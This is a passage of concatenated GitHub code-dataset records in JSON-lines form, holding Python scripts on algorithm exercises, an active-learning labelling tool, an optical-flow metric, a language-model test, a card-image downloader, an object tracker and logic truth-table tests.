__call__(self):\n self.deploy_net()\n self.trainG_net()\n self.trainP_net()\n","repo_name":"bacTlink/caffe_illu","sub_path":"net/gan/GAN.py","file_name":"GAN.py","file_ext":"py","file_size_in_byte":2842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18891290611","text":"import sys\n\ninput = sys.stdin.readline\n\nN, T = map(int, input().split())\n\nsubj = [tuple(map(int, input().split())) for _ in range(N)]\n\nD = [[0] * (T + 1) for _ in range(N + 1)]\n\nfor t in range(1, T + 1):\n for i in range(1, N + 1):\n if t - subj[i - 1][0] >= 0:\n D[i][t] = max(D[i - 1][t], D[i - 1][t - subj[i - 1][0]] + subj[i - 1][1])\n else:\n D[i][t] = max(D[i - 1][t], D[i][t - 1])\n\nprint(D[-1][-1])","repo_name":"JeonghakLee/AlgorithmStudy","sub_path":"Pangpyo/[BOJ]-14728.py","file_name":"[BOJ]-14728.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37478975354","text":"#\n# Pulls all of the contents from each of the URLs in the 'urls' list,\n# and returns what appears to be the favorite word, where the\n# metric for what favorite means is outlined above\n#\n\ndef getFavoriteWord(urls):\n import urllib.request\n import re\n import operator\n from operator import itemgetter\n\n responseText = urllib.request.urlopen(urls)\n dic_result = {}\n\n for line in responseText:\n line = line.decode('utf-8') # Decoding the binary data to text.\n words = line.split()\n \t# print(words)\n for i,f in enumerate(words):\n f = f.replace(\"\\\"\", \"\")\n f = re.sub(\"[',;.?!())]\", '', f) #replace char like ...\n \t\t# Check if word is lowercase\n if(f.islower()):\n \t\t\t# check if word is in dictionary yet or not\n if(f in dic_result):\n dic_result[f] = dic_result[f] + 1\n else:\n dic_result[f] = 1\n\n # for w in sorted(set(dic_result)):\n # print(w + \": \" + str(dic_result[w]))\n\n for w in sorted(dic_result, key=dic_result.get, reverse=True):\n print(w + \": \"+ str(dic_result[w]))\n\n # htmlSource = responseText.read()\n # print(dic_result)\n responseText.close()\n # print(htmlSource)\n\ngetFavoriteWord(\"http://www.gutenberg.org/files/5200/5200.txt\")\n","repo_name":"nakayamaqs/PythonModule","sub_path":"Assignment/favword.py","file_name":"favword.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12832982836","text":"## @file\n# Active learning module: Functions for facilitating active (and passive) learning\n# by Anna Andraszek\n\nimport time\nfrom IPython import display\nimport paths\nfrom PIL import Image, ImageDraw\n\nimport textractor.textloading\nfrom textractor import textloading\nimport re\nimport img2pdf\nfrom pdf2image import convert_from_path, exceptions\nimport os\nimport numpy as np\nfrom modAL.models import ActiveLearner\nfrom modAL.uncertainty import uncertainty_sampling\nfrom sklearn.ensemble import RandomForestClassifier\nimport pandas as pd\nimport json\nimport sklearn\nfrom report import machine_learning_helper as mlh\nfrom borehole import tables\nimport random\n\n\n## Gets input from the console and checks its validity\n# @param classes array of ints representing classes\n# @return valid user input for a class\ndef get_input(classes):\n y = -1\n while y not in classes:\n print(\"Enter one of: \", str(classes))\n y = input()\n try:\n y = int(y) # set it as int here instead of on input to avoid error breaking execution when input is bad\n except:\n continue\n return y\n\n\n## Displays part of a page in python notebook\n# @param docid Unique identifying int of report\n# @param page page number\n# @param line line number\n# @param mode A string indicating the 'version' of the model - can be a name, or 'production'\ndef display_page(docid, page, line=None, mode=paths.dataset_version):\n pg_path = paths.get_report_page_path(int(docid), int(page)) # docid, page\n image = Image.open(pg_path)\n width, height = image.size\n\n if line:\n draw = ImageDraw.Draw(image, 'RGBA')\n draw.line([(1, 1), (1, height-3)], fill=\"blue\", width=3) # draw parallel lines down the page\n draw.line([(width-3, 1), (width-3, height-3)], fill=\"blue\", width=3)\n\n docinfofile = paths.get_restructpageinfo_file(docid)\n docinfo = json.load(open(docinfofile, \"r\"))\n pageinfo = docinfo[str(page)]\n lineinfo = pageinfo[int(line)-1] #-1 because linenum starts from 1\n\n box = lineinfo['BoundingBox']\n ln_left = width * box['Left']\n ln_top = height * box['Top']\n\n crop_height = height / 3\n left = 0\n right = width\n top = ln_top - box['Height'] - (crop_height/2) # bottom > top bc of coordinate system\n bottom = ln_top + (crop_height/2)\n\n if top < 0: # if top is outside of bounds, add to it to make it 0, and sub from bottom\n change = top\n top = 0\n bottom -= change\n draw.line([(1, 1), (width-3, 1)], fill=\"blue\", width=3)\n\n elif bottom > height:\n change = bottom - height\n bottom = height\n top -= change\n draw.line([(1, height-3), (width-3, height-3)], fill=\"blue\", width=3)\n\n draw.rectangle([ln_left, ln_top, ln_left + (width * box['Width']), ln_top + (height * box['Height'])], outline='green', width=2)\n\n crop_image = image.crop((left, top, right, bottom))\n #crop_ln_top = crop_height * box['Top']\n\n #draw.rectangle([ln_left, crop_ln_top, ln_left + (width * box['Width']), crop_ln_top + (crop_height * box['Height'])], outline='green')\n image = crop_image\n\n display.display(image)\n # line option: draw a box around the line\n # get docinfo, query the line number and bounding box\n # crop page to about 1/3 of it to make it more focused on the line\n\n print(pg_path)\n if line: print(\"line: \", line)\n\n## Used instead of uncertainty sampling when classifying borehole tables, because uncertainty sampling will sample inputs with UNK tokens.\n# This sampling method looks for specific words and gets a random set of n_queries of inputs containing these.\n# @param pool Dataframe of unlabelled samples\n# @param n_queries how many are to be sampled\n# @return idx, inst: indices of samples and samples\ndef borehole_sample(pool, n_queries):\n hole_words = ['hole', 'bore', 'well', 'core']#, 'drill']\n hole_pool = []\n for word in hole_words:\n word_pool = [(x, idx) for x, idx in zip(pool.iloc[:,0], pool.index.values) if word in x]\n hole_pool.extend(word_pool)\n hole_pool = set(hole_pool)\n hole_pool = list(hole_pool)\n sample = random.sample(hole_pool, n_queries)\n idx = np.asanyarray([i[1] for i in sample])\n inst = np.asanyarray([i[0] for i in sample])\n #idx.shape = (idx.shape[0], 1)\n inst.shape = (inst.shape[0], 1)\n return idx, inst\n\n## Allows user to annotate data in notebook, when there is unlabelled data, and then train the model with those annotations included.\n# Data given to label is that which has most uncertain label to the model.\n# Can be used to try to incrementally improve model with previously unlabelled data, but can also be a good way of labelling\n# data as it presents it in its original context, wheras the contents of the csv the dataset resides in may be also transformed / not have context.\n# Can be slow - as it gets and displays images.\n# Must be run in python notebook to view images. (However, can change display function to disply image in pop up.)\n# @param data A dataset stored as a pandas DataFrame\n# @param n_queries Number of points of data to label in active learning\n# @param y_column The name of the column containing y values\n# @param estimator The model to train. Currently use scikit-learn and keras models.\n# @param limit_cols Columns in the dataset to exclude from x\n# @param mode A string indicating the 'version' of the model - can be a name, or 'production'\n# @return labelled data, accuracy of model, trained model\ndef active_learning(data, n_queries, y_column, estimator=RandomForestClassifier(), limit_cols=None, mode=paths.dataset_version):\n line = False\n if y_column in ['Marginal', 'Heading']: # covers marginal_lines, heading_id_toc, heading_id_intext\n line = True # determines if a line or page is to to be displayed\n classes = pd.unique(data[y_column].values) #todo: check type\n classes = sorted(filter(lambda v: v==v, classes))\n X_initial, Y_initial, X_pool, y_pool, refs = al_data_prep(data, y_column, limit_cols, mode)\n if mode == paths.production:\n test_percentage = 0\n else:\n test_percentage = 0.2\n if 'lstm' in estimator.named_steps:\n test_size = int(X_initial.shape[0] * test_percentage)\n X_train, y_train = X_initial[:-test_size], Y_initial[:-test_size]\n X_test, y_test = X_initial[-test_size:], Y_initial[-test_size:]\n else:\n X_train, X_test, y_train, y_test = sklearn.model_selection.train_test_split(X_initial, Y_initial,\n test_size=test_percentage)\n learner = ActiveLearner(estimator=estimator, #ensemble.RandomForestClassifier(),\n query_strategy=uncertainty_sampling,\n X_training=X_train.values, y_training=y_train.astype(int))\n accuracy_scores = [learner.score(X_test, y_test.astype(int))]\n if 'boreholes' not in mode:\n query_idx, query_inst = learner.query(X_pool, n_instances=n_queries)\n query_idx = np.asarray([refs['idx'][i] for i in query_idx])\n else:\n query_idx, query_inst = borehole_sample(X_pool, n_queries)\n y_new = np.zeros(n_queries, dtype=int)\n time.sleep(5)\n for i in range(n_queries):\n idx = query_idx[i]\n #page=int(query_inst[i][0])\n if 'boreholes' not in mode:\n page = refs['pagenums'].loc[idx]\n if line:\n line=refs['linenums'].loc[idx]\n if 'boreholes' in mode:\n page = refs['Tables'].loc[idx]\n y = al_input_loop(learner, query_inst[i], refs['docids'].loc[idx], n_queries, classes, page=page, line=line, mode=mode)\n y_new[i] = y\n #print(\"index: \", idx)\n #print(\"x: \", data.at[idx, 'Columns'])\n data.at[idx, y_column] = y # save value to copy of data\n data.at[idx, 'TagMethod'] = 'manual'\n\n learner.teach(query_inst, y_new) # reshape 1, -1\n accuracy_scores.append(learner.score(X_test, y_test.astype(int)))\n preds = learner.predict(X_test)\n #print(\"End of annotation. Samples, predictions, annotations: \")\n #print(ref_docids.iloc[query_idx].values,\n # np.concatenate((query_inst, np.array([preds]).T, y_new.reshape(-1, 1)), axis=1))\n print(sklearn.metrics.confusion_matrix(preds, y_test.astype(int)))\n accuracy = accuracy_scores[-1]\n print(accuracy)\n return data, accuracy, learner\n\n## When there is no unlabelled data, the model is trained without active learning.\n# @param data A dataset stored as a pandas DataFrame\n# @param y_column The name of the column containing y values\n# @param estimator The model to train. Currently use scikit-learn and keras models.\n# @param limit_cols Columns in the dataset to exclude from x\n# @param mode A string indicating the 'version' of the model - can be a name, or 'production'\n# @return accuracy, trained model\ndef passive_learning(data, y_column, estimator=sklearn.ensemble.RandomForestClassifier(), limit_cols=None, mode=paths.dataset_version):\n print(\"training with all labelled samples\")\n data = data.dropna(subset=[y_column])\n default_drop = ['DocID', 'TagMethod']\n if limit_cols:\n default_drop.extend(limit_cols)\n X, Y = mlh.data_prep(data, limit_cols=default_drop, y_column=y_column)\n if paths.production in mode:\n X_train, X_test, y_train, y_test = X, X, Y, Y # no split test set\n else:\n test_percentage = 0.2\n print(\"test set size: \", test_percentage)\n X_train, X_test, y_train, y_test = sklearn.model_selection.train_test_split(X, Y, test_size=test_percentage)\n #X, Y = X.astype(int), Y.astype(int) # pd's Int64 dtype accepts NaN # but Int64 dtype is \"unknown\" # need to change this line to accept with str input, not sure how\n\n learner = estimator.fit(X_train, y_train)\n # y_pred = learner.predict(X_test)\n # accuracy = sklearn.metrics.accuracy_score(y_test, y_pred)\n if 'TagMethod' in data.columns:\n valid_set = data.loc[(data['TagMethod'] == \"manual\") | (data['TagMethod'] == \"legacy\")]\n else:\n valid_set = data # for legacy dataset\n valid_x, valid_y = mlh.data_prep(valid_set, y_column=y_column, limit_cols=default_drop)\n valid_y = valid_y.astype(int)\n # valid_x = valid_set.drop(columns=['DocID', 'TOCPage', \"TagMethod\"])\n y_pred = learner.predict(valid_x)\n accuracy = sklearn.metrics.accuracy_score(valid_y, y_pred)\n conf = sklearn.metrics.confusion_matrix(valid_y, y_pred)\n print(\"Test set results: \")\n pred = learner.predict(X_test)\n print(sklearn.metrics.accuracy_score(y_test, pred))\n print(sklearn.metrics.confusion_matrix(y_test, pred))\n print(\"For manually annotated:\")\n print(accuracy)\n print(conf)\n\n # print false negatives\n # print('False negatives: ')\n # for i in range(len(valid_y)):\n # if valid_y.iloc[i] != y_pred[i]:\n # if y_pred[i] == 0:\n # print(valid_x.iloc[i])\n\n\n return accuracy, learner\n\n## Train a model\n# @param data A dataset stored as a pandas DataFrame\n# @param y_column The name of the column containing y values\n# @param n_queries Number of points of data to label in active learning\n# @param estimator The model to train. Currently use scikit-learn and keras models.\n# @param datafile The filename of the dataset in 'data'\n# @param limit_cols Columns in the dataset to exclude from x\n# @param mode A string indicating the 'version' of the model - can be a name, or 'production'\n# @return accuracy, trained model\ndef train(data, y_column, n_queries, estimator, datafile, limit_cols=None, mode=paths.dataset_version):\n unlabelled = data[y_column].loc[data[y_column].isnull()]\n\n if len(unlabelled) < n_queries: # if less unlabelled than want to sample, reduce sample size\n if len(unlabelled) == 0:\n data[y_column].loc[data['TagMethod'] == 'auto'] = np.nan\n else:\n n_queries = len(unlabelled)\n\n if n_queries > 0:\n updated_data, accuracy, learner = active_learning(data, n_queries, y_column, estimator, limit_cols, mode)\n updated_data.to_csv(datafile, index=False) # save slightly more annotated dataset\n else:\n accuracy, learner = passive_learning(data, y_column, estimator, limit_cols, mode)\n return accuracy, learner\n\n## Adds labels to unlabelled members of a dataset using predictions from its respective model, and saves to the same file.\n# @param type name of the model\n# @param classification_function function inside the model which acts like predict()\n# @param y_column The name of the column containing y values\n# @param mode A string indicating the 'version' of the model - can be a name, or 'production'\ndef automatically_tag(type, classification_function, y_column, mode=paths.dataset_version):\n source = paths.get_dataset_path(type, mode) # 'toc'\n df = pd.read_csv(source)\n df = df.reset_index(drop=True)\n new_tags = classification_function(df, masked=False) # can add mode parameter if ever use it on production set\n #idx = df.loc[((df['TagMethod'] != 'legacy') != (df['TOCPage'] == df['TOCPage'])) & (df['TagMethod'] != 'manual')].index.values #= new_tags.loc[(df['TagMethod'] != 'legacy') & (df['TagMethod'] != 'manual')]\n idx = df.loc[((df['TagMethod'] == 'auto') | (df['TagMethod'] != df['TagMethod'])) | (df[y_column] != df[y_column])].index.values # join of auto and TOCPage==None\n df.loc[idx, y_column] = new_tags.loc[idx]\n df.loc[idx, 'TagMethod'] = 'auto'\n print(len(idx), \" automatically tagged\")\n #df['TagMethod'].loc[(df['TagMethod'] != 'legacy') & (df['TagMethod'] != 'manual')] = 'auto'\n if 'proba' in df.columns:\n df = df.drop(columns=['proba'])\n df.to_csv(source, index=False)\n\n## Displays a borehole table\n# @param docid Unique identifying int of report\n# @param table Table number\ndef display_df(docid, table):\n dfs = tables.get_tables(docid)\n df = dfs[table-1]\n pd.set_option('display.max_rows', 500)\n pd.set_option('display.max_columns', 500)\n pd.set_option('display.width', 1000)\n #display.display(df)\n print(df)\n print()\n print(docid, \"table: \", table-1)\n print()\n\n## Active learning user input loop\n# @param learner The model to train. Currently use scikit-learn and keras models.\n# @param inst unlabelled samples\n# @param docid Unique identifying int of report\n# @param n_queries number of samples\n# @param classes array of ints representing classes\n# @param page page number\n# @param line line number\n# @param mode A string indicating the 'version' of the model - can be a name, or 'production'\n# @return user input class\ndef al_input_loop(learner, inst, docid, n_queries, classes, page=None, line=None, mode=paths.dataset_version):\n print(\"Waiting to display next....\")\n display.clear_output(wait=True)\n #print(inst)\n\n pred = learner.predict(inst.reshape(1, -1))\n #preds.append(pred[0])\n\n if mode != 'boreholes':\n display_page(int(docid), int(page), line) # docid, pagenum, line\n else:\n display_df(int(docid), int(page))\n #print(inst)\n\n time.sleep(1) # sometimes the input box doesn't show, i think because it doesn't have the time\n\n print(\"queries: \", n_queries)\n #if i == 0:\n # print(\"predict proba of all samples\")\n # print(learner.predict_proba(query_inst))\n #else:\n print(\"predict proba of this sample: \", learner.predict_proba([inst]))\n print(\"Prediction: \", pred)\n #print('Is this page a Table of Contents?')\n # print(pg_path)\n print()\n y = get_input(classes)\n return y\n\n\n## Active learning data prep\n# @param data A dataset stored as a pandas DataFrame\n# @param y_column The name of the column containing y values\n# @param limit_cols Columns in the dataset to exclude from x\n# @param mode A string indicating the 'version' of the model - can be a name, or 'production'\n# @return labelled and unlabelled x and y samples, and original reference to pagenums, linenums, tablenums, where applicable\ndef al_data_prep(data, y_column, limit_cols=None, mode=paths.dataset_version): # to generalise further, should take limit_cols param and generalise data_prep\n default_drop = ['DocID', 'TagMethod']\n if not limit_cols:\n limit_cols = default_drop\n else:\n limit_cols.extend(default_drop)\n\n unlabelled = data.loc[data[y_column].isnull()]\n labelled = data.dropna(subset=[y_column]) # assume that will contain 0, 1 values\n X_initial, Y_initial = mlh.data_prep(labelled, limit_cols=limit_cols, y_column=y_column)\n\n refs = {}\n ref_docids = unlabelled.DocID # removing docids from X, but keeping them around in this to ref\n refs['docids'] = ref_docids\n if y_column in ['Heading', 'Marginal']:\n ref_pagenums = unlabelled.PageNum\n refs['pagenums'] = ref_pagenums\n if y_column in ['Heading', 'Marginal']:\n ref_linenums = unlabelled.LineNum\n refs['linenums'] = ref_linenums\n if mode=='boreholes':\n refs['Tables'] = unlabelled.TableNum\n\n X_pool, y_pool = mlh.data_prep(unlabelled, limit_cols=limit_cols, y_column=y_column)\n ref_idx = X_pool.index.values\n refs['idx'] = ref_idx\n X_pool.dropna(inplace=True)\n #X_pool, y_pool = X_pool.to_numpy(), y_pool.to_numpy() # COMMENT OUT FOR DEBUG\n return X_initial, Y_initial, X_pool, y_pool, refs\n\n\n## Saves pages of a document as individual images. This makes the display of a page faster, as the file to be opened is much smaller.\n# @param docid Unique identifying int of report\n# @param report_num File number\ndef save_report_pages(docid, report_num=1):\n report_path = paths.get_report_name(docid, local_path=True, file_extension='.pdf', file_num=report_num)\n try:\n images = convert_from_path(report_path)\n except exceptions.PDFPageCountError:\n fname = textractor.textloading.find_file(docid)\n rep_folder = (paths.get_report_name(docid, local_path=True, file_num=report_num)).split('cr')[0]\n if not os.path.exists(rep_folder):\n os.mkdir(rep_folder)\n\n if '.tif' in fname:\n report_in = re.sub('.pdf', '.tif', report_path)\n textloading.download_report(fname, report_in)\n with open(report_path, \"wb\") as f:\n f.write(img2pdf.convert(open(report_in, \"rb\")))\n else:\n textloading.download_report(fname, report_path)\n images = convert_from_path(report_path)\n\n for i in range(len(images)):\n pgpath = paths.get_report_page_path(docid, i + 1)\n images[i].save(pgpath)\n\n\n# if __name__ ==\"__main__\":\n# #display_page('70562', 5, 4)\n# import heading_id_toc\n# automatically_tag('proc_heading_id_toc', heading_id_toc.get_toc_headings, 'Heading')\n\n#\n# if __name__ == \"__main__\":\n# sample = textloading.get_reportid_sample(1000, cutoffdate=None)\n# #p = subprocess.Popen([], cwd=\"C:/Users/andraszeka/OneDrive - ITP (Queensland Government)/gsq-boreholes/\")\n# #subprocess.call(\"cd C:/Users/andraszeka/OneDrive - ITP (Queensland Government)/gsq-boreholes/\")\n# for id in sample:\n# print(\"aws s3 cp s3://gsq-horizon/QDEX/\" + id + \" 1000sample/\" + id + \" --recursive\")\n# #cmd = \"aws s3 cp s3://gsq-horizon/QDEX/\" + id + \" 1000sample/\" + id + \"--recursive\"\n# #subprocess.call(cmd)\n\n\n\n# def data_prep(data, limit_cols=None, y_column=None): # y=False,\n# X = data\n# if limit_cols:\n# #X = X.drop(columns=limit_cols)\n# for col in limit_cols:\n# try:\n# X = X.drop(columns=[col])\n# except:\n# print('column ', col, \" doesn't exist in X\") # makes it ok to accidentally have multiple of the same col in limit_cols\n# if y_column:\n# X = X.drop(columns=[y_column])\n# Y = data[y_column]\n# return X, Y\n# return X\n\n\n\n","repo_name":"annaandraszek/anna-gsq-boreholes","sub_path":"textracting/report/active_learning.py","file_name":"active_learning.py","file_ext":"py","file_size_in_byte":19858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31302746108","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef msen(flow: np.ndarray, gt: np.ndarray, plot: bool = False) -> float:\n \"\"\"\n Mean squared error in non occluded areas\n :param flow\n :param gt\n :return:\n \"\"\"\n\n flow_uv = flow[:, :, 0:2]\n gt_uv = gt[:, :, 0:2]\n\n idx_zeros = gt[:, :, 2] == 0\n\n sen = np.linalg.norm(flow_uv - gt_uv, axis=2)\n\n if plot:\n plt.figure()\n plt.title('Histogram of errors')\n plt.hist(sen[np.logical_not(idx_zeros)], 25)\n plt.show()\n\n return float(np.mean(sen[np.logical_not(idx_zeros)]))\n","repo_name":"mcv-m6-video/mcv-m6-2019-team5","sub_path":"w1_w2/metrics/msen.py","file_name":"msen.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"72565307714","text":"from typing import List\n\nclass Solution:\n def maxProduct(self, nums: List[int]) -> int:\n \n \n def dp( i ):\n \n if i == 0:\n # Base case on index 0\n # min value, max value, max product are first value in array\n return nums[0], nums[0], nums[0]\n \n \n ## General cases\n \n prev_min, prev_max, prev_product = dp(i-1)\n \n # local max comes from product of two positive numbers, or product of two negative numbers\n candidate = [prev_min * nums[i], prev_max * nums[i], nums[i] ]\n cur_min = min( candidate )\n cur_max = max( candidate )\n product = max(prev_product, cur_max)\n \n return cur_min, cur_max, product\n \n # ----------------------------------------\n return dp( len(nums)-1 )[2]\n\nimport unittest\n\nclass Testing( unittest.TestCase ):\n\n def test_case_1( self ):\n\n result = Solution().maxProduct( nums=[2,3,-2,4] )\n self.assertEqual(result, 6)\n\n\n def test_case_2( self ):\n\n result = Solution().maxProduct( nums=[-2,0,-1] )\n self.assertEqual(result, 0)\n\n\nif __name__ == '__main__':\n\n unittest.main()","repo_name":"brianchiang-tw/leetcode","sub_path":"Dynamic_Programming_I/Maximum Product Subarray/by_recursion_memo.py","file_name":"by_recursion_memo.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"61"} +{"seq_id":"18614960365","text":"# -*- coding: utf-8 -*-\n\nimport pytest\n\nimport pickle\n\nimport tensorflow as tf\n\nfrom inferbeddings.lm.loader2 import SNLILoader\nfrom inferbeddings.lm.model import LanguageModel\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\ndef test_lm_snli_overfit():\n checkpoint_path = 'models/snli/dam_1/dam_1'\n vocabulary_path = 'models/snli/dam_1/dam_1_index_to_token.p'\n\n with open(vocabulary_path, 'rb') as f:\n index_to_token = pickle.load(f)\n token_to_index = {token: index for index, token in index_to_token.items()}\n\n vocab_size = len(token_to_index)\n embedding_size = 300\n rnn_size = 64\n num_epochs = 10\n\n learning_rate = 0.1\n\n config = {\n 'model': 'lstm',\n 'seq_length': 4,\n 'batch_size': 8,\n 'vocab_size': vocab_size,\n 'embedding_size': embedding_size,\n 'rnn_size': rnn_size,\n 'num_layers': 1\n }\n\n loader = SNLILoader(path='data/snli/tiny/one.jsonl.gz',\n token_to_index=token_to_index,\n batch_size=config['batch_size'],\n seq_length=config['seq_length'],\n shuffle=True)\n\n loader.create_batches()\n\n discriminator_scope_name = 'discriminator'\n with tf.variable_scope(discriminator_scope_name):\n embedding_layer = tf.get_variable('embeddings',\n shape=[vocab_size + 3, embedding_size],\n initializer=tf.contrib.layers.xavier_initializer(),\n trainable=False)\n\n lm_scope_name = 'language_model'\n with tf.variable_scope(lm_scope_name) as scope:\n model = LanguageModel(model=config['model'],\n seq_length=config['seq_length'],\n batch_size=config['batch_size'],\n rnn_size=config['rnn_size'],\n num_layers=config['num_layers'],\n vocab_size=config['vocab_size'],\n embedding_layer=embedding_layer,\n infer=False)\n\n scope.reuse_variables()\n imodel = LanguageModel(model=config['model'],\n seq_length=config['seq_length'],\n batch_size=config['batch_size'],\n rnn_size=config['rnn_size'],\n num_layers=config['num_layers'],\n vocab_size=config['vocab_size'],\n embedding_layer=embedding_layer,\n infer=True)\n\n optimizer = tf.train.AdagradOptimizer(learning_rate)\n train_op = optimizer.minimize(model.cost)\n\n init_op = tf.global_variables_initializer()\n\n emb_saver = tf.train.Saver([embedding_layer], max_to_keep=1)\n\n with tf.Session() as session:\n session.run(init_op)\n\n emb_saver.restore(session, checkpoint_path)\n\n for epoch_id in range(0, num_epochs):\n logger.debug('Epoch: {}'.format(epoch_id))\n\n loader.reset_batch_pointer()\n state = session.run(model.initial_state)\n\n for batch_id in range(loader.pointer, loader.num_batches):\n x, y = loader.next_batch()\n\n feed_dict = {\n model.input_data: x,\n model.targets: y,\n model.initial_state: state\n }\n\n loss_value = session.run(model.cost, feed_dict=feed_dict)\n state = session.run(model.final_state, feed_dict=feed_dict)\n _ = session.run(train_op, feed_dict=feed_dict)\n\n print(loss_value)\n\n sample_value = imodel.sample(session, index_to_token, token_to_index,\n 10, 'A', 0, 1, 4)\n print(sample_value)\n\nif __name__ == '__main__':\n pytest.main([__file__])\n","repo_name":"uclnlp/inferbeddings","sub_path":"tests/inferbeddings/lm/test_overfit.py","file_name":"test_overfit.py","file_ext":"py","file_size_in_byte":3964,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"61"} +{"seq_id":"30942861775","text":"import urllib2\nimport re\n\nfrom urllib import FancyURLopener\nclass MyOpener(FancyURLopener):\n version = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11'\n\npage = urllib2.urlopen(\"http://magiccards.info/query?q=dark+ritual&v=card&s=cname\")\npattern = re.compile('http://magiccards.info/scans/.*\"')\n\nbytes_to_read = 1000\nwhile 1:\n matches = pattern.findall(page.read(bytes_to_read))\n if len(matches) == 1:\n image_url = matches[0].strip('\"')\n browser = MyOpener()\n browser.retrieve(image_url, 'carta.jpg')\n break\n else:\n bytes_to_read += 1000\n","repo_name":"agelgustavo/houc","sub_path":"scripts/imageDownloader.py","file_name":"imageDownloader.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12451602707","text":"#!/usr/bin/python\n\nimport vot\nimport sys\nimport time\nimport cv2\nimport numpy\nimport collections\nimport numpy as np\n\n\nclass VCTracker(object):\n\n def __init__(self, image, region):\n self.window = max(region.width, region.height) * 2\n\n left = max(region.x, 0)\n top = max(region.y, 0)\n\n right = min(region.x + region.width, image.shape[1] - 1)\n bottom = min(region.y + region.height, image.shape[0] - 1)\n\n # Initial template\n self.template = image[int(top):int(bottom), int(left):int(right)]\n # Center position of the template (u,v)\n self.position = (region.x + region.width / 2, region.y + region.height / 2)\n # Size of the template (width, height)\n self.size = (region.width, region.height)\n\n # Use these lines for testing.\n # Comment them when you evaluate with the vot toolkit\n im = cv2.rectangle(image, (int(left), int(top)), (int(right), int(bottom)), (255, 0, 0), 2)\n cv2.imshow('result', im)\n cv2.imshow('template', self.template)\n cv2.waitKey(1) # change 0 to 1 - remove waiting for key press\n\n # *******************************************************************\n # This is the function to fill. You can also modify the class and add additional\n # helper functions and members if needed\n # It should return, in this order, the u (col) and v (row) coordinates of the top left corner\n # the width and the height of the bounding box\n # *******************************************************************\n def track(self, image):\n # Fill here the function\n # You have the information in self.template, self.position and self.size\n # You can update them and add other variables\n\n left = max(0, int(self.position[0] - self.size[0]))\n top = max(0, int(self.position[1] - self.size[1]))\n right = min(image.shape[1] - 1, int(self.position[0] + self.size[0]))\n bottom = min(image.shape[0] - 1, int(self.position[1] + self.size[1]))\n\n smallerImage = image[int(top):int(bottom), int(left):int(right)]\n res = cv2.matchTemplate(smallerImage, self.template, cv2.TM_CCOEFF_NORMED)\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)\n\n left = left + max_loc[0]\n top = top + max_loc[1]\n self.position = (left + float(self.size[0]) / 2, top + float(self.size[1]) / 2)\n\n confidence = max_val\n\n nextLeft = max(left, 0)\n nextTop = max(top, 0)\n nextRight = min(left + self.size[0], image.shape[1] - 1)\n nextBottom = min(top + self.size[1], image.shape[0] - 1)\n self.template = image[int(nextTop):int(nextBottom), int(nextLeft):int(nextRight)]\n\n return vot.Rectangle(left, top, self.size[0], self.size[1]), confidence\n\n\n# *****************************************\n# VOT: Create VOT handle at the beginning\n# Then get the initializaton region\n# and the first image\n# *****************************************\nhandle = vot.VOT(\"rectangle\")\nselection = handle.region()\n\n# Process the first frame\nimagefile = handle.frame()\nif not imagefile:\n sys.exit(0)\nimage = cv2.imread(imagefile)\n\n# Initialize the tracker\ntracker = VCTracker(image, selection)\n\nwhile True:\n # *****************************************\n # VOT: Call frame method to get path of the\n # current image frame. If the result is\n # null, the sequence is over.\n # *****************************************\n imagefile = handle.frame()\n if not imagefile:\n break\n image = cv2.imread(imagefile)\n\n # Track the object in the image \n region, confidence = tracker.track(image)\n\n # Use these lines for testing.\n # Comment them when you evaluate with the vot toolkit\n im = cv2.rectangle(image, (int(region.x), int(region.y)),\n (int(region.x + region.width), int(region.y + region.height)), (255, 0, 0), 2)\n cv2.imshow('result', im)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n # *****************************************\n # VOT: Report the position of the object\n # every frame using report method.\n # *****************************************\n handle.report(region, confidence)\n","repo_name":"AlvaroNavarroMora/RVA_VisionChallenge","sub_path":"tracker/vision_challenge_tracker.py","file_name":"vision_challenge_tracker.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"41942131831","text":"from unittest import TestCase\nfrom logic.language import PropositionalConstant, PropositionalVocabulary\nfrom logic.syntax import Negation, SimpleSentence\nfrom logic.display import TruthTable\n\nclass TruthTableTest(TestCase):\n def test_basic_simple_string(self):\n vocab = PropositionalVocabulary([PropositionalConstant(\"a\")])\n table = TruthTable(vocab)\n\n result = table.simple_string\n\n self.assertEqual(\n\"\"\"+---+\n| a |\n+---+\n| 1 |\n| 0 |\n+---+\"\"\", result)\n\n def test_larger_simple_string(self):\n a_constant = PropositionalConstant(\"a\")\n vocab = PropositionalVocabulary([\n a_constant,\n PropositionalConstant(\"b\")\n ])\n table = TruthTable(vocab, [Negation(SimpleSentence(a_constant))])\n\n result = table.simple_string\n\n self.assertEqual(\n\"\"\"+---+---+----+\n| a | b | -a |\n+---+---+----+\n| 1 | 1 | 0 |\n| 1 | 0 | 0 |\n| 0 | 1 | 1 |\n| 0 | 0 | 1 |\n+---+---+----+\"\"\", result)\n\n def test_basic_matrix(self):\n constant_a = PropositionalConstant(\"a\")\n vocab = PropositionalVocabulary([constant_a])\n table = TruthTable(vocab)\n\n result = table.matrix\n\n self.assertEqual([[SimpleSentence(constant_a), True, False]], result)\n\n def test_larger_matrix(self):\n a_constant = PropositionalConstant(\"a\")\n b_constant = 